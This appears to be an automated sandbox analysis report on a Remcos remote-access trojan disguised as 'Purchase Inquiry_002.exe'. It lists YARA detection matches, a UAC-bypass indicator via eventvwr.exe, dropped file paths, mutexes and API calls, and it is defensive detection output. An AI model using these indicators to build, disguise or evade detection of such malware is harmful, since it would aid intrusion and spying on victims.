            Source: Yara match | File source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000E.00000002.1359604043.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.3752310900.0000000001537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Purchase Inquiry_002.exe PID: 8184, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0041A76C SystemParametersInfoW, 14_2_0041A76C

            System Summary

            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: initial sample | Static PE information: Filename: Purchase Inquiry_002.exe
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00414DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 14_2_00414DB4
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_0281D57C 0_2_0281D57C
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D834B8 0_2_06D834B8
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D82106 0_2_06D82106
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D86678 0_2_06D86678
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D86669 0_2_06D86669
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D8B606 0_2_06D8B606
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D8F748 0_2_06D8F748
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D834A8 0_2_06D834A8
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D8F310 0_2_06D8F310
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D8FB80 0_2_06D8FB80
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D96300 0_2_06D96300
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Code function: 0_2_06D905D8 0_2_06D905D8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_013ED57C 10_2_013ED57C
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_073534B8 10_2_073534B8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_07352106 10_2_07352106
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_0735F748 10_2_0735F748
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_07356678 10_2_07356678
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_07356669 10_2_07356669
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_073534A8 10_2_073534A8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_0735F310 10_2_0735F310
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_0735EED8 10_2_0735EED8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_0735FB80 10_2_0735FB80
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_07425560 10_2_07425560
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 10_2_074205D8 10_2_074205D8
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00425152 14_2_00425152
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00435286 14_2_00435286
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004513D4 14_2_004513D4
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0045050B 14_2_0045050B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00436510 14_2_00436510
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004316FB 14_2_004316FB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0043569E 14_2_0043569E
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00443700 14_2_00443700
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004257FB 14_2_004257FB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_004128E3 14_2_004128E3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00425964 14_2_00425964
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0041B917 14_2_0041B917
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0043D9CC 14_2_0043D9CC
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00435AD3 14_2_00435AD3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00424BC3 14_2_00424BC3
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0043DBFB 14_2_0043DBFB
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0044ABA9 14_2_0044ABA9
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00433C0B 14_2_00433C0B
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00434D8A 14_2_00434D8A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0043DE2A 14_2_0043DE2A
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0041CEAF 14_2_0041CEAF
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00435F08 14_2_00435F08
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: String function: 00402073 appears 51 times
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: String function: 00432B90 appears 53 times
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: String function: 00432525 appears 41 times
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1341190098.0000000002831000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1346439746.0000000006F30000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1338186322.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000000.1285877304.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezJGj.exeP vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1345811797.0000000006C0D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe, 00000000.00000002.1346068741.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe | Binary or memory string: OriginalFilenamezJGj.exeP vs Purchase Inquiry_002.exe
            Source: Purchase Inquiry_002.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 14.2.xASiLfzXONGIW.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.43ad470.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0.2.Purchase Inquiry_002.exe.4337e50.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
            Source: 0000000A.00000002.1383390917.0000000003F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.1342558664.0000000004337000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: 00000000.00000002.1342558664.0000000003965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: Purchase Inquiry_002.exe PID: 7180, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 1412, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: xASiLfzXONGIW.exe PID: 6124, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Purchase Inquiry_002.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: xASiLfzXONGIW.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, oAHMyelsBlebo17c9D.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, T4r8SDCIv33WlslpT4.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.cs | Security API names: _0020.SetAccessControl
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Purchase Inquiry_002.exe.6f30000.5.raw.unpack, oAHMyelsBlebo17c9D.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.Purchase Inquiry_002.exe.39b85e0.3.raw.unpack, T4r8SDCIv33WlslpT4.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@19/17@12/2
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 14_2_00415C90
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, 14_2_0040E2E7
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource, 14_2_00419493
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Code function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 14_2_00418A00
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | File created: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Mutant created: \Sessions\1\BaseNamedObjects\gig-1IH5DX
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe | Mutant created: \Sessions\1\BaseNamedObjects\PByueLbLyolhtCqZ
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3EA3.tmp
            Source: Purchase Inquiry_002.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Purchase Inquiry_002.exe | ReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\Purchase Inquiry_002.exe | File read: C:\Users\user\Desktop\Purchase Inquiry_002.exe
            Source: unknown | Process created: C:\Users\user\Desktop\Purchase Inquiry_002.exe "C:\Users\user\Desktop\Purchase Inquiry_002.exe"
